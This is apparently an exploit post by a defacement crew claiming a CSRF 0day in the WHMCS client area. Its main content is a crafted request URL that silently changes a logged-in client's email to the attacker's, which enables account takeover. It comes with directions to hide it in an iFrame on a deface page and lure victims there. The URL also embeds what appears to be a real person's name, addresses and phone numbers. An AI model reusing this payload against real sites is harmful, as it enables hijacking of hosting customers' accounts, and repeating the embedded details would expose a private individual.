# Exploit Title: WHMCS [CSRF] All Versions (0day)
# Team: MaDLeeTs
# Software Link: http://www.whmcs.com
# Version: All
# Site: http://www.MaDLeeTs.com
# Email: LeeTHaXor@Y7Mail.com
https://[TARGETS WEBHOST]/clientarea.php?action=details&save=true&firstname=Max&lastname=Fong&companyname=Antswork+Communications+Sdn+Bhd&email=[ YOUR EMAIL ADDRESS ]&address1=B10-12,+Endah+Puri+Condominium,&address2=Jalan+3/149E,+Taman+Seri+Endah+&city=Seri+Petaling&state=Wilayah+Persekutuan&postcode=57000&country=MY&phonenumber=0060390592663&paymentmethod=none&billingcid=0&customfield[1]=max@antswork.com&customfield[2]=&customfield[3]=+6019.3522298&customfield[4]=+603.90578663&customfield[5]=Laura+-+0192182996&customfield[6]=Owner+of+Company&customfield[7]=&customfield[8]=&customfield[9]=Old+Contact+Details:+A2-11-8,+Vista+Komanwel+A2+Bukit+Jalil+57700+Kuala+Lumpur+Tel:+603.86560268+Fax:+603.8?6560768
########################iFrame Code To Add On Deface##############################
All you need to do is add it into your Deface page and make your target view the deface page, He MUST loggin 1st into his clientarea in order to get his email updated.
Greetz to : H4x0rL1f3 | KhantastiC HaXor | H4x0r HuSsY | b0x | Invectus | Shadow008 | Neo HaXor | Hitcher | Dr.Z0mbie | Hmei7 | phpBugz | MindCracker |
c0rrupt | r00x | Pain006 | Ment@l Mind | M4DSh4k | H1d@lG0 | AlphaSky | 3thicaln00b | e0fx | madc0de |
makman | DeaTh AnGeL | Lnxr00t | x3o-1337 | Tor Demon | T4p10N | AL.MaX HaCkEr | | ThaRude | ThaDark |
Evil-DZ | H3ll-dz | Over-X | 3xp1r3 Cyber Army | Pakistan Cyber Army And All MaDLeeTs TeaM Members